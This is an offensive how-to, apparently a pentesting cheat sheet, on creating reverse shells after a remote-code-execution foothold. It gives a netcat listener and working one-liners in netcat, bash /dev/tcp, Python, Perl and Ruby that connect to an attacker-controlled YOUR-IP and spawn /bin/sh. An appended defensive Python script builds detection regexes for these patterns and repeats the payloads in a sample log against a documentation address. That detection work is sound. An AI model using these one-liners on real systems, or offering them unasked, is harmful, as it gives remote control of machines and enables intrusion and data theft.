
How to create a reverse shell


Since we are talking about reverse shell connections, I think it would be nice to show where and how they can be applied.

In general, once you find a vulnerability that allows arbitrary code execution (RCE), the next step is to start a reverse shell.

Netcat

Netcat is a Unix utility for establishing TCP and UDP connections and for receiving and transmitting data over them. Despite its usefulness and simplicity, many do not know how to use it and undeservedly overlook it.

With this utility you can carry out some of the steps of a penetration test. This is useful when the target machine has no extra packages installed (or installing them would attract attention), or when the platform is restricted (for example, IoT / embedded devices), and so on.

What can be done with netcat:

  • Scan ports;
  • Forward ports;
  • Collect service banners;
  • Listen on a port (bind for a reverse connection);
  • Download and upload files;
  • Output raw HTTP content;
  • Create a mini chat.

In general, netcat can stand in for several Unix utilities, so the tool can be thought of as a kind of Swiss Army knife for certain tasks.

$ nc -nvlp 443

This command opens a listener on TCP port 443 on all interfaces; the same port is used in the examples below.

Netcat

$ nc -e /bin/sh YOUR-IP 443

In my opinion, this is the most classic reverse shell example, but these days netcat may simply not be installed on the server.

Bash

$ bash -i >& /dev/tcp/YOUR-IP/443 0>&1

* And this example, in my opinion, is the most dangerous, because apart from the bash interpreter (sh, ksh, zsh, etc.) it requires no additional software at all; only access to the /dev subsystem is needed.

Python

$ python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("YOUR-IP",443)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'

* Python is almost always present in modern distributions, and its standard library is quite enough to make a reverse shell connection.

Perl

$ perl -e 'use Socket; $i="YOUR-IP"; $p=443; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};'

* Just like Python, Perl ships with almost all modern Linux distributions.

Ruby

$ ruby -rsocket -e 'f=TCPSocket.open("YOUR-IP",443).to_i; exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

* Ruby is found on modern Linux distributions, but much less often than Python and Perl.
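As an added, defender-side example that is not part of the original cheat sheet, the script below turns the one-liners above into detection rules and runs them over a constructed process-execution log. The log format ("pid=… uid=… cmd=…") and the address 192.0.2.10 are assumptions made for the example.

```python
import re

# Added example (not from the original cheat sheet): flag the reverse-shell
# patterns shown on this page in process-execution logs. The log format is an
# assumed, constructed one: "<timestamp> pid=<n> uid=<n> cmd=<command line>".
RULES = [
    # nc -e /bin/sh HOST PORT  (netcat told to run a program)
    ("netcat-exec", re.compile(r"\b(?:nc|ncat)\b.*\s-\w*e\s+/bin/(?:ba)?sh")),
    # bash -i >& /dev/tcp/HOST/PORT 0>&1  (no network binary involved at all)
    ("bash-dev-tcp", re.compile(r"/dev/(?:tcp|udp)/[^/\s]+/\d+")),
    # python: socket + dup2 of the socket onto fds 0-2 + spawn of a shell
    ("python-socket-shell", re.compile(r"socket\.socket\(.*\bdup2\(.*/bin/(?:ba)?sh")),
    # perl: Socket module, connect(), STDIN/STDOUT/STDERR reopened onto S, exec()
    ("perl-socket-shell", re.compile(r"use Socket;.*\bconnect\(.*>&S.*\bexec\(")),
    # ruby: TCPSocket.open(...) followed by exec of an interactive shell
    ("ruby-socket-shell", re.compile(r"TCPSocket\.open\(.*\bexec\b.*/bin/(?:ba)?sh -i")),
    # any interactive shell whose stdin/stdout/stderr all point at one descriptor
    ("shell-stdio-redirect", re.compile(r"/bin/(?:ba)?sh -i\s*<&%?\w+\s*>&%?\w+\s*2>&")),
]

def scan_cmdline(cmdline):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan_log(lines):
    """Return [(line_no, cmdline, matched_rules)] for each suspicious log line."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = re.search(r"\bcmd=(.*)$", line)
        if not m:
            continue  # malformed line: skip it rather than abort the scan
        names = scan_cmdline(m.group(1))
        if names:
            hits.append((no, m.group(1), names))
    return hits

# Constructed sample log; 192.0.2.10 is a documentation address, not a real host.
SAMPLE_LOG = [
    "2024-01-01T10:00:00Z pid=1201 uid=33 cmd=/usr/sbin/apache2 -k start",
    "2024-01-01T10:00:05Z pid=1344 uid=33 cmd=nc -e /bin/sh 192.0.2.10 443",
    "2024-01-01T10:00:09Z pid=1350 uid=33 cmd=bash -i >& /dev/tcp/192.0.2.10/443 0>&1",
    '2024-01-01T10:00:12Z pid=1355 uid=33 cmd=python -c import socket,subprocess,os;'
    's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.0.2.10",443));'
    'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);'
    'p=subprocess.call(["/bin/sh","-i"]);',
    '2024-01-01T10:00:15Z pid=1358 uid=33 cmd=perl -e use Socket;$i="192.0.2.10";$p=443;'
    'socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,'
    'inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};',
    "2024-01-01T10:00:20Z pid=1360 uid=1000 cmd=nc -zv 192.0.2.10 443",
    '2024-01-01T10:00:25Z pid=1370 uid=0 cmd=ruby -rsocket -e f=TCPSocket.open("192.0.2.10",443).to_i;'
    'exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)',
]

if __name__ == "__main__":
    for no, cmd, names in scan_log(SAMPLE_LOG):
        print(f"line {no}: {', '.join(names)}: {cmd[:60]}")
```

The plain `nc -zv` port check on line 6 is deliberately left unflagged: the rules key on a shell being wired to a socket, not on netcat itself.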
